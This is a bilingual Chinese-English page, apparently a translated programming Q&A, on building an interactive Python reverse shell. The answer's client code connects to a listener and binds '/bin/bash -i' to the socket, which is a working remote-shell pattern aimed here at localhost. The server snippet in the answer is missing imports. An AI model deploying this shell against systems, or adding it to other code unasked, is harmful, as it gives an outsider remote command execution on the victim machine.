Python真正的交互式远程反向shell [英] Python true interactive remote reverse shell

问题描述

我正在尝试使用 Python 创建一个 true 交互式远程 shell.当我说 true 时，我的意思是我不想只执行一个命令并发送结果——我已经在工作了.我也不想通过让服务器解释目录更改或不解释来抽象执行单个命令.

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.

我正在尝试让客户端启动交互式 /bin/bash 并让服务器发送命令，然后这些命令由同一个持久性 shell 执行.例如，如果我运行 cd/foo/bar 那么 pwd 将返回 /foo/bar 因为我将与相同的 bash 交互壳.

I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.

这里有一些精简的示例代码，目前只能执行单个命令...

Here's some slimmed down example code that currently only will do single command execution...

# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

while True:
    cmd = s.recv(1024)

    # single command execution currently (not interactive shell)
    results = subprocess.Popen(cmd, shell=True,
              stdout=subprocess.PIPE, stderr=subprocess.PIPE,
              stdin=subprocess.PIPE)
    results = results.stdout.read() + results.stderr.read()

    s.sendall(results)

<小时>

# server.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)

conn, _ = s.accept()

while True:
    cmd = raw_input('> ').rstrip()
    conn.send(cmd)

    results = conn.recv(4096)
    print results

我尝试了很多解决方案，但都没有奏效.subprocess 模块有一个通信方法，但它在一个命令后杀死了 shell.我真的很希望能够使用 stdlib 来完成此操作，但在阅读了此线程后，我查看了 pexpect 模块.但是，我也不能让它工作?看起来它的主要用例也不是用于创建交互式 shell，而是捕获特定的命令行输出以进行交互.我什至无法使用 pexpect 执行单个命令...

I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...

import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')

如果有人可以提供帮助，我将不胜感激，我觉得可能有一种方法可以实现多线程并使用子进程生成 /bin/bash -i 以及一些如何写入 stdin并从标准输出读取?提前致谢，抱歉篇幅过长.

If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.

推荐答案

试试这个代码:

# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

process = subprocess.Popen(['/bin/bash', '-i'],
              stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
              stdin=s.makefile('rb'))
process.wait()

# server.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)

conn, _ = s.accept()

fp = conn.makefile('wb')

proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
    fp.write(sys.stdin.read(4096))
proc1.wait()

这篇关于Python真正的交互式远程反向shell的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！